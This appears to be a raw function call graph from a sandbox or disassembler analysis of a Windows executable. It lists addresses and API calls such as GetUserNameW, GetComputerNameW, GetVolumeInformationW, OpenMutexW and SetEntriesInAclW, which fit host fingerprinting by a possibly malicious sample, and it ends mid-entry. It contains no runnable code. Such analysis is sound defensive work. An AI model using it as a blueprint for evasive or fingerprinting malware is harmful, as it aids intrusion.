110827->110877 110879 47d649 107 API calls _free 110827->110879 110829 407e4f 59 API calls 110828->110829 110830 47d7c0 CharLowerBuffW 110829->110830 110880 45f167 110830->110880 110834 407667 59 API calls 110835 47d7f9 110834->110835 110836 40784b 59 API calls 110835->110836 110837 47d810 110836->110837 110839 407d2c 59 API calls 110837->110839 110838 47d858 Mailbox 110838->110816 110840 47d81c Mailbox 110839->110840 110840->110838 110887 47cfdf 61 API calls 2 library calls 110840->110887 110842 47c989 110841->110842 110846 47c9de 110841->110846 110843 420db6 Mailbox 59 API calls 110842->110843 110844 47c9ab 110843->110844 110845 420db6 Mailbox 59 API calls 110844->110845 110844->110846 110845->110844 110847 47da50 110846->110847 110848 47dc79 Mailbox 110847->110848 110855 47da73 _strcat _wcscpy __NMSG_WRITE 110847->110855 110848->110806 110849 409b3c 59 API calls 110849->110855 110850 409be6 59 API calls 110850->110855 110851 409b98 59 API calls 110851->110855 110852 409837 84 API calls 110852->110855 110853 42571c 58 API calls _W_store_winword 110853->110855 110855->110848 110855->110849 110855->110850 110855->110851 110855->110852 110855->110853 110890 465887 61 API calls 2 library calls 110855->110890 110857 420c1d 110856->110857 110858 420cb5 VirtualProtect 110857->110858 110859 420c83 110857->110859 110858->110859 110859->110809 110859->110810 110860->110816 110861->110816 110862->110813 110864 4092d6 110863->110864 110865 420db6 Mailbox 59 API calls 110864->110865 110866 4092e4 110865->110866 110867 4092f0 110866->110867 110891 4091fc 59 API calls Mailbox 110866->110891 110869 409050 110867->110869 110892 409160 110869->110892 110871 40905f 110872 420db6 Mailbox 59 API calls 110871->110872 110873 4090fb 110871->110873 110872->110873 110873->110827 110874 408d40 59 API calls Mailbox 110873->110874 110874->110821 110875->110827 110876->110827 110877->110827 110878->110799 110879->110827 110881 45f192 __NMSG_WRITE 110880->110881 110882 45f1c7 110881->110882 110883 45f278 110881->110883 110886 45f1d1 110881->110886 110882->110886 110888 4078c4 61 API calls 110882->110888 110883->110886 110889 4078c4 61 API calls 110883->110889 110886->110834 110886->110840 110887->110838 110888->110882 110889->110883 110890->110855 110891->110867 110893 409169 Mailbox 110892->110893 110894 43f19f 110893->110894 110899 409173 110893->110899 110895 420db6 Mailbox 59 API calls 110894->110895 110897 43f1ab 110895->110897 110896 40917a 110896->110871 110899->110896 110900 409c90 59 API calls Mailbox 110899->110900 110900->110899 110902 463c3e 110901->110902 110903 464475 FindFirstFileW 110901->110903 110902->109484 110903->110902 110904 46448a FindClose 110903->110904 110904->110902 110905->109768 110906->109740 110907->109755 110908->109751 110909->109756 110910->109766 110911->109769 110912->109773 110913->109502 110914->109504 110915->109394 110916->109394 110917->109388 110918->109392 110919->109396 110920->109392 110921->109417 110922 401066 110927 40f76f 110922->110927 110924 40106c 110925 422d40 __cinit 67 API calls 110924->110925 110926 401076 110925->110926 110928 40f790 110927->110928 110960 41ff03 110928->110960 110932 40f7d7 110933 407667 59 API calls 110932->110933 110934 40f7e1 110933->110934 110935 407667 59 API calls 110934->110935 110936 40f7eb 110935->110936 110937 407667 59 API calls 110936->110937 110938 40f7f5 110937->110938 110939 407667 59 API calls 110938->110939 110940 40f833 110939->110940 110941 407667 59 API calls 110940->110941 110942 40f8fe 110941->110942 110970 415f87 110942->110970 110946 40f930 110947 407667 59 API calls 110946->110947 110948 40f93a 110947->110948 110998 41fd9e 110948->110998 110950 40f981 110951 40f991 GetStdHandle 110950->110951 110952 40f9dd 110951->110952 110953 4445ab 110951->110953 110954 40f9e5 OleInitialize 110952->110954 110953->110952 110955 4445b4 110953->110955 110954->110924 111005 466b38 64 API calls Mailbox 110955->111005 110957 4445bb 111006 467207 CreateThread 110957->111006 110959 4445c7 CloseHandle 110959->110954 111007 41ffdc 110960->111007 110963 41ffdc 59 API calls 110964 41ff45 110963->110964 110965 407667 59 API calls 110964->110965 110966 41ff51 110965->110966 110967 407bcc 59 API calls 110966->110967 110968 40f796 110967->110968 110969 420162 6 API calls 110968->110969 110969->110932 110971 407667 59 API calls 110970->110971 110972 415f97 110971->110972 110973 407667 59 API calls 110972->110973 110974 415f9f 110973->110974 111014 415a9d 110974->111014 110977 415a9d 59 API calls 110978 415faf 110977->110978 110979 407667 59 API calls 110978->110979 110980 415fba 110979->110980 110981 420db6 Mailbox 59 API calls 110980->110981 110982 40f908 110981->110982 110983 4160f9 110982->110983 110984 416107 110983->110984 110985 407667 59 API calls 110984->110985 110986 416112 110985->110986 110987 407667 59 API calls 110986->110987 110988 41611d 110987->110988 110989 407667 59 API calls 110988->110989 110990 416128 110989->110990 110991 407667 59 API calls 110990->110991 110992 416133 110991->110992 110993 415a9d 59 API calls 110992->110993 110994 41613e 110993->110994 110995 420db6 Mailbox 59 API calls 110994->110995 110996 416145 RegisterWindowMessageW 110995->110996 110996->110946 110999 45576f 110998->110999 111000 41fdae 110998->111000 111017 469ae7 60 API calls 110999->111017 111002 420db6 Mailbox 59 API calls 111000->111002 111004 41fdb6 111002->111004 111003 45577a 111004->110950 111005->110957 111006->110959 111018 4671ed 65 API calls 111006->111018 111008 407667 59 API calls 111007->111008 111009 41ffe7 111008->111009 111010 407667 59 API calls 111009->111010 111011 41ffef 111010->111011 111012 407667 59 API calls 111011->111012 111013 41ff3b 111012->111013 111013->110963 111015 407667 59 API calls 111014->111015 111016 415aa5 111015->111016 111016->110977 111017->111003 111019 40552a 111026 405ab8 111019->111026 111025 40555a Mailbox 111027 420db6 Mailbox 59 API calls 111026->111027 111028 405acb 111027->111028 111029 420db6 Mailbox 59 API calls 111028->111029 111030 40553c 111029->111030 111031 4054d2 111030->111031 111045 4058cf 111031->111045 111034 405514 111034->111025 111037 408061 MultiByteToWideChar 111034->111037 111036 4054e3 111036->111034 111052 405bc0 111036->111052 111058 405a7a 111036->111058 111038 408087 111037->111038 111039 4080ce 111037->111039 111041 420db6 Mailbox 59 API calls 111038->111041 111040 407d8c 59 API calls 111039->111040 111044 4080c0 111040->111044 111042 40809c MultiByteToWideChar 111041->111042 111075 40774d 59 API calls 2 library calls 111042->111075 111044->111025 111046 4058e0 111045->111046 111047 43dc3c 111045->111047 111046->111036 111067 455ecd 59 API calls Mailbox 111047->111067 111049 43dc46 111050 420db6 Mailbox 59 API calls 111049->111050 111051 43dc52 111050->111051 111053 405c33 111052->111053 111057 405bce 111052->111057 111068 405c4e SetFilePointerEx 111053->111068 111054 405bf6 111054->111036 111056 405c06 ReadFile 111056->111054 111056->111057 111057->111054 111057->111056 111059 43dcee 111058->111059 111060 405a8e 111058->111060 111074 455ecd 59 API calls Mailbox 111059->111074 111069 4059b9 111060->111069 111063 43dcf9 111065 420db6 Mailbox 59 API calls 111063->111065 111064 405a9a 111064->111036 111066 43dd0e _memmove 111065->111066 111067->111049 111068->111057 111070 4059d1 111069->111070 111073 4059ca _memmove 111069->111073 111071 43dc7e 111070->111071 111072 420db6 Mailbox 59 API calls 111070->111072 111072->111073 111073->111064 111074->111063 111075->111044 111076 ae5085 111077 ae506f 111076->111077 111078 ae5089 111076->111078 111081 b08550 111077->111081 111080 ae5078 111100 b08556 111081->111100 111082 b08145 GetLastError 111102 b07dd7 111082->111102 111083 b08579 FreeSid 111083->111100 111084 b08bc1 GetLastError 111084->111100 111085 b083fb GetUserNameW 111085->111102 111086 b08209 GetUserNameW 111086->111102 111104 b07d37 111086->111104 111087 b08986 SetEntriesInAclW 111087->111100 111088 b0890b LocalFree 111088->111100 111089 b089cd OpenMutexW 111089->111080 111090 b08248 111093 b0824a GetLastError 111090->111093 111091 b07d30 111095 b07d6c GetVolumeInformationW 111091->111095 111091->111104 111093->111080 111094 b0836e GetLastError 111094->111102 111095->111080 111096 b07fd4 GetLastError 111096->111102 111097 b07d20 111097->111091 111097->111095 111099 b07d83 GetWindowsDirectoryW 111097->111099 111097->111104 111105 b07e06 GetComputerNameW 111097->111105 111098 b08599 111098->111091 111101 b0896a wsprintfW 111098->111101 111099->111091 111099->111104 111100->111081 111100->111082 111100->111083 111100->111084 111100->111087 111100->111088 111100->111089 111100->111091 111100->111097 111100->111098 111100->111101 111100->111102 111103 b08953 AllocateAndInitializeSid 111100->111103 111100->111104 111101->111091 111102->111082 111102->111085 111102->111086 111102->111090 111102->111091 111102->111093 111102->111094 111102->111095 111102->111096 111102->111097 111102->111104 111106 b07f6b GetVolumeInformationW 111102->111106 111103->111100 111104->111080 111105->111104 111106->111102 111107 40e5ab 111110 40d100 111107->111110 111109 40e5b9 111111 40d11d 111110->111111 111139 40d37d 111110->111139 111112 4426e0 111111->111112 111113 442691 111111->111113 111142 40d144 111111->111142 111154 47a3e6 341 API calls __cinit 111112->111154 111115 442694 111113->111115 111124 4426af 111113->111124 111117 4426a0 111115->111117 111115->111142 111152 47a9fa 341 API calls 111117->111152 111118 422d40 __cinit 67 API calls 111118->111142 111121 40d434 111146 408a52 68 API calls 111121->111146 111122 4428b5 111122->111122 111123 40d54b 111123->111109 111124->111139 111153 47aea2 341 API calls 3 library calls 111124->111153 111128 4427fc 111158 47a751 89 API calls 111128->111158 111129 40d443 111129->111109 111132 4084c0 69 API calls 111132->111142 111139->111123 111159 469e4a 89 API calls 4 library calls 111139->111159 111140 409ea0 341 API calls 111140->111142 111141 408047 59 API calls 111141->111142 111142->111118 111142->111121 111142->111123 111142->111128 111142->111132 111142->111139 111142->111140 111142->111141 111144 408740 68 API calls __cinit 111142->111144 111145 408542 68 API calls 111142->111145 111147 40843a 68 API calls 111142->111147 111148 40cf7c 341 API calls 111142->111148 111149 409dda 59 API calls Mailbox 111142->111149 111150 40cf00 89 API calls 111142->111150 111151 40cd7d 341 API calls 111142->111151 111155 408a52 68 API calls 111142->111155 111156 409d3c 60 API calls Mailbox 111142->111156 111157 45678d 60 API calls 111142->111157 111144->111142 111145->111142 111146->111129 111147->111142 111148->111142 111149->111142 111150->111142 111151->111142 111152->111123 111153->111139 111154->111142 111155->111142 111156->111142 111157->111142 111158->111139 111159->111122 111160 40e48c 111163 40ccba 111160->111163 111162 40e498 111164 40ccd2 111163->111164 111171 40cd26 111163->111171 111166 409ea0 341 API calls 111164->111166 111164->111171 111169 40cd09 111166->111169 111167 4425bc 111167->111167 111168 40cd4f 111168->111162 111169->111168 111172 409d3c 60 API calls Mailbox 111169->111172 111171->111168 111173 469e4a 89 API calls 4 library calls 111171->111173 111172->111171 111173->111167 111174 ae7b22 111175 ae7b2b 111174->111175 111177 ae5f10 111174->111177 111176 ae6084 SetFilePointerEx 111176->111177 111177->111176 111178 ae5d90 111177->111178 111179 aeb180 111188 aeb0de 111179->111188 111180 aeb2a7 SetFilePointerEx 111183 aeb1df 111180->111183 111184 aeb1c6 111180->111184 111181 aeb196 111182 aeb3a6 111181->111182 111181->111184 111185 aeb328 SetFilePointerEx 111182->111185 111186 aeb3b2 111182->111186 111184->111183 111187 aeb2e0 WriteFile 111184->111187 111188->111179 111188->111180 111188->111181 111188->111185 111189 aeb0d0 SetFilePointerEx 111188->111189 111190 aeb253 111188->111190 111189->111188 111191 aeb054 111189->111191 111192 403633 111193 40366a 111192->111193 111194 4036e7 111193->111194 111195 403688 111193->111195 111229 4036e5 111193->111229 111197 4036ed 111194->111197 111198 43d0cc 111194->111198 111199 403695 111195->111199 111200 40374b PostQuitMessage 111195->111200 111196 4036ca DefWindowProcW 111234 4036d8 111196->111234 111203 4036f2 111197->111203 111204 403715 SetTimer RegisterWindowMessageW 111197->111204 111241 411070 10 API calls Mailbox 111198->111241 111201 4036a0 111199->111201 111202 43d154 111199->111202 111200->111234 111207 403755 111201->111207 111208 4036a8 111201->111208 111257 462527 71 API calls _memset 111202->111257 111211 4036f9 KillTimer 111203->111211 111212 43d06f 111203->111212 111209 40373e CreatePopupMenu 111204->111209 111204->111234 111206 43d0f3 111242 411093 341 API calls Mailbox 111206->111242 111239 4044a0 64 API calls _memset 111207->111239 111214 4036b3 111208->111214 111215 43d139 111208->111215 111209->111234 111237 40443a Shell_NotifyIconW _memset 111211->111237 111218 43d074 111212->111218 111219 43d0a8 MoveWindow 111212->111219 111221 43d124 111214->111221 111230 4036be 111214->111230 111215->111196 111256 457c36 59 API calls Mailbox 111215->111256 111216 43d166 111216->111196 111216->111234 111222 43d097 SetFocus 111218->111222 111223 43d078 111218->111223 111219->111234 111255 462d36 81 API calls _memset 111221->111255 111222->111234 111225 43d081 111223->111225 111223->111230 111224 40370c 111238 403114 DeleteObject DestroyWindow Mailbox 111224->111238 111240 411070 10 API calls Mailbox 111225->111240 111229->111196 111230->111196 111243 40443a Shell_NotifyIconW _memset 111230->111243 111232 403764 111232->111234 111235 43d118 111244 40434a 111235->111244 111237->111224 111238->111234 111239->111232 111240->111234 111241->111206 111242->111230 111243->111235 111245 404375 _memset 111244->111245 111258 404182 111245->111258 111248 4043fa 111250 404430 Shell_NotifyIconW 111248->111250 111251 404414 Shell_NotifyIconW 111248->111251 111252 404422 111250->111252 111251->111252 111262 40407c 111252->111262 111254 404429 111254->111229 111255->111232 111256->111229 111257->111216 111259 43d423 111258->111259 111260 404196 111258->111260 111259->111260 111261 43d42c DestroyIcon 111259->111261 111260->111248 111284 462f94 62 API calls _W_store_winword 111260->111284 111261->111260 111263 404098 111262->111263 111264 40416f Mailbox 111262->111264 111265 407a16 59 API calls 111263->111265 111264->111254 111266 4040a6 111265->111266 111267 4040b3 111266->111267 111268 43d3c8 LoadStringW 111266->111268 111269 407bcc 59 API calls 111267->111269 111271 43d3e2 111268->111271 111270 4040c8 111269->111270 111270->111271 111273 4040d9 111270->111273 111272 407b2e 59 API calls 111271->111272 111278 43d3ec 111272->111278 111274 4040e3 111273->111274 111275 404174 111273->111275 111276 407b2e 59 API calls 111274->111276 111277 408047 59 API calls 111275->111277 111280 4040ed _memset _wcscpy 111276->111280 111277->111280 111279 407cab 59 API calls 111278->111279 111278->111280 111281 43d40e 111279->111281 111282 404155 Shell_NotifyIconW 111280->111282 111283 407cab 59 API calls 111281->111283 111282->111264 111283->111280 111284->111248 111285 427c56 111286 427c62 111285->111286 111322 429e08 GetStartupInfoW 111286->111322 111289 427cbf 111291 427cca 111289->111291 111407 427da6 58 API calls 3 library calls 111289->111407 111290 427c67 111324 428b7c GetProcessHeap 111290->111324 111325 429ae6 111291->111325 111294 427cd0 111295 427cdb __RTC_Initialize 111294->111295 111408 427da6 58 API calls 3 library calls 111294->111408 111346 42d5d2 111295->111346 111298 427cea 111299 427cf6 GetCommandLineW 111298->111299 111409 427da6 58 API calls 3 library calls 111298->111409 111365 434f23 GetEnvironmentStringsW 111299->111365 111302 427cf5 111302->111299 111305 427d10 111306 427d1b 111305->111306 111410 4230b5 58 API calls 3 library calls 111305->111410 111375 434d58 111306->111375 111309 427d21 111310 427d2c 111309->111310 111411 4230b5 58 API calls 3 library calls 111309->111411 111389 4230ef 111310->111389 111313 427d34 111314 427d3f __wwincmdln 111313->111314 111412 4230b5 58 API calls 3 library calls 111313->111412 111395 4047d0 111314->111395 111317 427d53 111318 427d62 111317->111318 111413 423358 58 API calls _doexit 111317->111413 111414 4230e0 58 API calls _doexit 111318->111414 111321 427d67 _raise 111323 429e1e 111322->111323 111323->111290 111324->111289 111415 423187 36 API calls 2 library calls 111325->111415 111327 429aeb 111416 429d3c InitializeCriticalSectionAndSpinCount __getstream 111327->111416 111329 429af0 111330 429af4 111329->111330 111418 429d8a TlsAlloc 111329->111418 111417 429b5c 61 API calls 2 library calls 111330->111417 111333 429af9 111333->111294 111334 429b06 111334->111330 111335 429b11 111334->111335 111419 4287d5 111335->111419 111337 429b53 111427 429b5c 61 API calls 2 library calls 111337->111427 111341 429b58 111341->111294 111342 429b32 111342->111337 111343 429b38 111342->111343 111426 429a33 58 API calls 4 library calls 111343->111426 111345 429b40 GetCurrentThreadId 111345->111294 111347 42d5de _raise 111346->111347 111348 429c0b __lock 58 API calls 111347->111348 111349 42d5e5 111348->111349 111350 4287d5 __calloc_crt 58 API calls 111349->111350 111351 42d5f6 111350->111351 111352 42d661 GetStartupInfoW 111351->111352 111353 42d601 _raise @_EH4_CallFilterFunc@8 111351->111353 111359 42d7a5 111352->111359 111361 42d676 111352->111361 111353->111298 111354 42d86d 111441 42d87d LeaveCriticalSection _doexit 111354->111441 111356 42d6c4 111356->111359 111362 42d6f8 GetFileType 111356->111362 111439 429e2b InitializeCriticalSectionAndSpinCount 111356->111439 111357 4287d5 __calloc_crt 58 API calls 111357->111361 111358 42d7f2 GetStdHandle 111358->111359 111359->111354 111359->111358 111360 42d805 GetFileType 111359->111360 111440 429e2b InitializeCriticalSectionAndSpinCount 111359->111440 111360->111359 111361->111356 111361->111357 111361->111359 111362->111356 111366 427d06 111365->111366 111367 434f34 111365->111367 111371 434b1b GetModuleFileNameW 111366->111371 111367->111367 111442 42881d 58 API calls 2 library calls 111367->111442 111369 434f5a _memmove 111370 434f70 FreeEnvironmentStringsW 111369->111370 111370->111366 111372 434b4f _wparse_cmdline 111371->111372 111374 434b8f _wparse_cmdline 111372->111374 111443 42881d 58 API calls 2 library calls 111372->111443 111374->111305 111376 434d71 __NMSG_WRITE 111375->111376 111380 434d69 111375->111380 111377 4287d5 __calloc_crt 58 API calls 111376->111377 111385 434d9a __NMSG_WRITE 111377->111385 111378 434df1 111379 422d55 _free 58 API calls 111378->111379 111379->111380 111380->111309 111381 4287d5 __calloc_crt 58 API calls 111381->111385 111382 434e16 111383 422d55 _free 58 API calls 111382->111383 111383->111380 111385->111378 111385->111380 111385->111381 111385->111382 111386 434e2d 111385->111386 111444 434607 58 API calls _raise 111385->111444 111445 428dc6 IsProcessorFeaturePresent 111386->111445 111388 434e39 111388->111309 111390 4230fb __IsNonwritableInCurrentImage 111389->111390 111460 42a4d1 111390->111460 111392 423119 __initterm_e 111393 422d40 __cinit 67 API calls 111392->111393 111394 423138 __cinit __IsNonwritableInCurrentImage 111392->111394 111393->111394 111394->111313 111396 4047ea 111395->111396 111406 404889 111395->111406 111397 404824 IsThemeActive 111396->111397 111463 42336c 111397->111463 111401 404850 111475 4048fd SystemParametersInfoW SystemParametersInfoW 111401->111475 111403 40485c 111476 403b3a 111403->111476 111406->111317 111407->111291 111408->111295 111409->111302 111413->111318 111414->111321 111415->111327 111416->111329 111417->111333 111418->111334 111420 4287dc 111419->111420 111422 428817 111420->111422 111424 4287fa 111420->111424 111428 4351f6 111420->111428 111422->111337 111425 429de6 TlsSetValue 111422->111425 111424->111420 111424->111422 111436 42a132 Sleep 111424->111436 111425->111342 111426->111345 111427->111341 111429 435201 111428->111429 111430 43521c 111428->111430 111429->111430 111431 43520d 111429->111431 111433 43522c HeapAlloc 111430->111433 111434 435212 111430->111434 111438 4233a1 DecodePointer 111430->111438 111437 428b28 58 API calls __getptd_noexit 111431->111437 111433->111430 111433->111434 111434->111420 111436->111424 111437->111434 111438->111430 111439->111356 111440->111359 111441->111353 111442->111369 111443->111374 111444->111385 111446 428dd1 111445->111446 111451 428c59 111446->111451 111450 428dec 111450->111388 111452 428c73 _memset __call_reportfault 111451->111452 111453 428c93 IsDebuggerPresent 111452->111453 111459 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 111453->111459 111455 428d57 __call_reportfault 111456 42c5f6 __ld12tod 6 API calls 111455->111456 111457 428d7a 111456->111457 111458 42a140 GetCurrentProcess TerminateProcess 111457->111458 111458->111450 111459->111455 111461 42a4d4 EncodePointer 111460->111461 111461->111461 111462 42a4ee 111461->111462 111462->111392 111464 429c0b __lock 58 API calls 111463->111464 111465 423377 DecodePointer EncodePointer 111464->111465 111528 429d75 LeaveCriticalSection 111465->111528 111467 404849 111468 4233d4 111467->111468 111469 4233f8 111468->111469 111470 4233de 111468->111470 111469->111401 111470->111469 111529 428b28 58 API calls __getptd_noexit 111470->111529 111472 4233e8 111530 428db6 9 API calls _raise 111472->111530 111474 4233f3 111474->111401 111475->111403 111477 403b47 __ftell_nolock 111476->111477 111478 407667 59 API calls 111477->111478 111479 403b51 GetCurrentDirectoryW 111478->111479 111531 403766 111479->111531 111528->111467 111529->111472 111530->111474 111532 407667 59 API calls 111531->111532 111533 40377c 111532->111533 111662 403d31 111533->111662 111535 40379a 111536 404706 61 API calls 111535->111536 111537 4037ae 111536->111537 111538 407de1 59 API calls 111537->111538 111539 4037bb 111538->111539 111540 404ddd 136 API calls 111539->111540 111541 4037d4 111540->111541 111542 43d173 111541->111542 111543 4037dc Mailbox 111541->111543 111704 46955b 111542->111704 111547 408047 59 API calls 111543->111547 111546 43d192 111549 422d55 _free 58 API calls 111546->111549 111550 4037ef 111547->111550 111548 404e4a 84 API calls 111548->111546 111551 43d19f 111549->111551 111676 40928a 111550->111676 111553 404e4a 84 API calls 111551->111553 111555 43d1a8 111553->111555 111559 403ed0 59 API calls 111555->111559 111556 407de1 59 API calls 111557 403808 111556->111557 111558 4084c0 69 API calls 111557->111558 111560 40381a Mailbox 111558->111560 111561 43d1c3 111559->111561 111562 407de1 59 API calls 111560->111562 111564 403ed0 59 API calls 111561->111564 111563 403840 111562->111563 111566 4084c0 69 API calls 111563->111566 111565 43d1df 111564->111565 111567 404706 61 API calls 111565->111567 111569 40384f Mailbox 111566->111569 111568 43d204 111567->111568 111570 403ed0 59 API calls 111568->111570 111572 407667 59 API calls 111569->111572 111571 43d210 111570->111571 111573 408047 59 API calls 111571->111573 111574 40386d 111572->111574 111575 43d21e 111573->111575 111679 403ed0 111574->111679 111577 403ed0 59 API calls 111575->111577 111579 43d22d 111577->111579 111586 408047 59 API calls 111579->111586 111581 403887 111581->111555 111582 403891 111581->111582 111583 422efd _W_store_winword 60 API calls 111582->111583 111584 40389c 111583->111584 111584->111561 111585 4038a6 111584->111585 111587 43d24f 111586->111587 111589 403ed0 59 API calls 111587->111589 111663 403d3e __ftell_nolock 111662->111663 111664 407bcc 59 API calls 111663->111664 111669 403ea4 Mailbox 111663->111669 111666 403d70 111664->111666 111665 4079f2 59 API calls 111665->111666 111666->111665 111674 403da6 Mailbox 111666->111674 111667 4079f2 59 API calls 111667->111674 111668 403e77 111668->111669 111670 407de1 59 API calls 111668->111670 111669->111535 111672 403e98 111670->111672 111671 407de1 59 API calls 111671->111674 111673 403f74 59 API calls 111672->111673 111673->111669 111674->111667 111674->111668 111674->111669 111674->111671 111739 403f74 111674->111739 111677 420db6 Mailbox 59 API calls 111676->111677 111678 4037fb 111677->111678 111678->111556 111680 403ef3 111679->111680 111681 403eda 111679->111681 111683 407bcc 59 API calls 111680->111683 111682 408047 59 API calls 111681->111682 111684 403879 111682->111684 111683->111684 111685 422efd 111684->111685 111686 422f09 111685->111686 111687 422f7e 111685->111687 111691 422f2e 111686->111691 111745 428b28 58 API calls __getptd_noexit 111686->111745 111747 422f90 60 API calls 3 library calls 111687->111747 111690 422f8b 111690->111581 111691->111581 111692 422f15 111746 428db6 9 API calls _raise 111692->111746 111694 422f20 111694->111581 111705 404ee5 85 API calls 111704->111705 111706 4695ca 111705->111706 111707 469734 96 API calls 111706->111707 111708 4695dc 111707->111708 111709 404f0b 74 API calls 111708->111709 111737 43d186 111708->111737 111710 4695f7 111709->111710 111711 404f0b 74 API calls 111710->111711 111712 469607 111711->111712 111713 404f0b 74 API calls 111712->111713 111714 469622 111713->111714 111715 404f0b 74 API calls 111714->111715 111716 46963d 111715->111716 111717 404ee5 85 API calls 111716->111717 111718 469654 111717->111718 111719 42571c _W_store_winword 58 API calls 111718->111719 111720 46965b 111719->111720 111721 42571c _W_store_winword 58 API calls 111720->111721 111722 469665 111721->111722 111723 404f0b 74 API calls 111722->111723 111724 469679 111723->111724 111725 469109 GetSystemTimeAsFileTime 111724->111725 111726 46968c 111725->111726 111727 4696b6 111726->111727 111728 4696a1 111726->111728 111729 4696bc 111727->111729 111730 46971b 111727->111730 111731 422d55 _free 58 API calls 111728->111731 111732 468b06 116 API calls 111729->111732 111733 422d55 _free 58 API calls 111730->111733 111734 4696a7 111731->111734 111733->111737 111737->111546 111737->111548 111740 403f82 111739->111740 111744 403fa4 _memmove 111739->111744 111742 420db6 Mailbox 59 API calls 111740->111742 111741 420db6 Mailbox 59 API calls 111743 403fb8 111741->111743 111742->111744 111743->111674 111744->111741 111745->111692 111746->111694 111747->111690 112036 401055 112041 402649 112036->112041 112039 422d40 __cinit 67 API calls 112040 401064 112039->112040 112042 407667 59 API calls 112041->112042 112043 4026b7 112042->112043 112048 403582 112043->112048 112046 402754 112047 40105a 112046->112047 112051 403416 59 API calls 2 library calls 112046->112051 112047->112039 112052 4035b0 112048->112052 112051->112046 112053 4035bd 112052->112053 112054 4035a1 112052->112054 112053->112054 112055 4035c4 RegOpenKeyExW 112053->112055 112054->112046 112055->112054 112056 4035de RegQueryValueExW 112055->112056 112057 403614 RegCloseKey 112056->112057 112058 4035ff 112056->112058 112057->112054 112058->112057 112059 ae5a3b 112060 ae5a45 112059->112060 112064 ae4f7c 112059->112064 112061 ae51ae 112060->112061 112062 ae5a4b CreateThread 112060->112062 112065 ae5a59 RtlExitUserThread 112062->112065 112063 ae4f88 112064->112063 112066 ae5d20 2 API calls 112064->112066 112069 ae5b1d 112065->112069 112068 ae4f99 112066->112068 112070 ae5d20 2 API calls 112069->112070 112071 ae5b3c 112070->112071 112071->112071 112072 401016 112077 404974 112072->112077 112075 422d40 __cinit 67 API calls 112076 401025 112075->112076 112078 420db6 Mailbox 59 API calls 112077->112078 112079 40497c 112078->112079 112080 40101b 112079->112080 112084 404936 112079->112084 112080->112075 112085 404951 112084->112085 112086 40493f 112084->112086 112088 4049a0 112085->112088 112087 422d40 __cinit 67 API calls 112086->112087 112087->112085 112089 407667 59 API calls 112088->112089 112090 4049b8 GetVersionExW 112089->112090 112091 407bcc 59 API calls 112090->112091 112092 4049fb 112091->112092 112093 407d2c 59 API calls 112092->112093 112102 404a28 112092->112102 112094 404a1c 112093->112094 112095 407726 59 API calls 112094->112095 112095->112102 112096 404a93 GetCurrentProcess IsWow64Process 112097 404aac 112096->112097 112099 404ac2 112097->112099 112100 404b2b GetSystemInfo 112097->112100 112098 43d864 112112 404b37 112099->112112 112101 404af8 112100->112101 112101->112080 112102->112096 112102->112098 112105 404ad4 112107 404b37 2 API calls 112105->112107 112106 404b1f GetSystemInfo 112108 404ae9 112106->112108 112109 404adc GetNativeSystemInfo 112107->112109 112108->112101 112110 404aef FreeLibrary 112108->112110 112109->112108 112110->112101 112113 404ad0 112112->112113 112114 404b40 LoadLibraryA 112112->112114 112113->112105 112113->112106 112114->112113 112115 404b51 GetProcAddress 112114->112115 112115->112113 112116 401078 112121 40708b 112116->112121 112118 40108c 112119 422d40 __cinit 67 API calls 112118->112119 112120 401096 112119->112120 112122 40709b __ftell_nolock 112121->112122 112123 407667 59 API calls 112122->112123 112124 407151 112123->112124 112125 404706 61 API calls 112124->112125 112126 40715a 112125->112126 112152 42050b 112126->112152 112129 407cab 59 API calls 112130 407173 112129->112130 112131 403f74 59 API calls 112130->112131 112132 407182 112131->112132 112133 407667 59 API calls 112132->112133 112134 40718b 112133->112134 112135 407d8c 59 API calls 112134->112135 112136 407194 RegOpenKeyExW 112135->112136 112137 43e8b1 RegQueryValueExW 112136->112137 112138 4071b6 Mailbox 112136->112138 112139 43e943 RegCloseKey 112137->112139 112140 43e8ce 112137->112140 112138->112118 112139->112138 112151 43e955 _wcscat Mailbox __NMSG_WRITE 112139->112151 112141 420db6 Mailbox 59 API calls 112140->112141 112142 43e8e7 112141->112142 112144 40522e 59 API calls 112142->112144 112143 4079f2 59 API calls 112143->112151 112145 43e8f2 RegQueryValueExW 112144->112145 112146 43e90f 112145->112146 112148 43e929 112145->112148 112147 407bcc 59 API calls 112146->112147 112147->112148 112148->112139 112149 407de1 59 API calls 112149->112151 112150 403f74 59 API calls 112150->112151 112151->112138 112151->112143 112151->112149 112151->112150 112153 431940 __ftell_nolock 112152->112153 112154 420518 GetFullPathNameW 112153->112154 112155 42053a 112154->112155 112156 407bcc 59 API calls 112155->112156 112157 407165 112156->112157 112157->112129 112158 aeaaf0 112159 aeab06 112158->112159 112163 aeab57 112159->112163 112164 ae6490 112159->112164 112166 ae5f10 112164->112166 112167 ae5d90 112164->112167 112165 ae6084 SetFilePointerEx 112165->112166 112166->112165 112166->112167 112168 b1faf0 112167->112168 112169 b1fafd 112168->112169 112173 b1fb84 112168->112173 112171 b1fb2a 112169->112171 112169->112173 112174 b2032f 112171->112174 112187 b21a1b 21 API calls 2 library calls 112171->112187 112172 b208d6 112172->112163 112175 b1fc05 112173->112175 112178 b1fbda 112173->112178 112174->112163 112179 b1fc38 112175->112179 112186 b20fe0 21 API calls __startOneArgErrorHandling 112175->112186 112177 b1fc22 112177->112163 112178->112179 112180 b21167 112178->112180 112181 b2116e 112178->112181 112179->112163 112188 b20ff7 21 API calls __startOneArgErrorHandling 112180->112188 112189 b20fe0 21 API calls __startOneArgErrorHandling 112181->112189 112184 b2116c 112184->112163 112185 b21173 112185->112163 112186->112177 112187->112172 112188->112184 112189->112185 112190 43fdfc 112229 40ab30 Mailbox _memmove 112190->112229 112192 45617e Mailbox 59 API calls 112217 40a057 112192->112217 112196 40b525 112431 469e4a 89 API calls 4 library calls 112196->112431 112197 420db6 59 API calls Mailbox 112214 409f37 Mailbox 112197->112214 112198 440055 112430 469e4a 89 API calls 4 library calls 112198->112430 112200 40b475 112205 408047 59 API calls 112200->112205 112203 440064 112205->112217 112206 40b47a 112206->112198 112218 4409e5 112206->112218 112209 408047 59 API calls 112209->112214 112210 407667 59 API calls 112210->112214 112211 422d40 67 API calls __cinit 112211->112214 112212 456e8f 59 API calls 112212->112214 112213 407de1 59 API calls 112213->112229 112214->112197 112214->112198 112214->112200 112214->112206 112214->112209 112214->112210 112214->112211 112214->112212 112215 4409d6 112214->112215 112214->112217 112219 40a55a 112214->112219 112423 40c8c0 341 API calls 2 library calls 112214->112423 112424 40b900 60 API calls Mailbox 112214->112424 112435 